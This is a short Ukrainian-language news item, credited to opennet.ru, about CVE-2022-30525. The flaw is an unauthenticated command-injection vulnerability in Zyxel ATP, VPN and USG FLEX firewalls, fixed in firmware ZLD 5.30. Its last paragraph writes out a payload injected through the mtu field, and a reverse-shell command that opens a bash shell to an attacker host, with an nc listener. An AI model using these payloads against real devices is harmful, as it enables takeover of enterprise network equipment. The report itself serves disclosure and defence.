У пристроях Zyxel серій ATP, VPN і USG FLEX, призначених для організації роботи міжмережевих екранів, IDS і VPN на підприємствах, виявлена критична вразливість (CVE-2022-30525), що дозволяє зовнішньому атакуючому без автентифікації виконати код пристрою з правами користувача nobody. Для скоєння атаки зловмисник повинен мати можливість надсилання на пристрій запитів за протоколом HTTP/HTTPS. Компанія Zyxel усунула вразливість у оновленні прошивки ZLD 5.30. За даними сервісу Shodan, в даний час у глобальній мережі зафіксовано 16213 потенційно вразливих пристроїв, що приймають запити по HTTP/HTTPS.
Експлуатація здійснюється через відправлення спеціально оформлених команд до web-обробника /ztp/cgi-bin/handler, доступного без автентифікації. Проблема викликана відсутністю належного чищення параметрів запиту при виконанні в системі команд за допомогою виклику os.system, який використовується в бібліотеці lib_wan_settings.py і виконується під час обробки операції setWanPortSt.
Наприклад, атакуючий може передати у полі mtu рядок «; ping 192.168.1.210; яка призведе до виконання у системі команди "ping 192.168.1.210". Для отримання доступу до командної оболонки можна запустити на своїй системі nc -lvnp 1270, після чого ініціювати зворотне з'єднання (reverse shell) відправивши на пристрій запит з параметром '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
Джерело: opennet.ru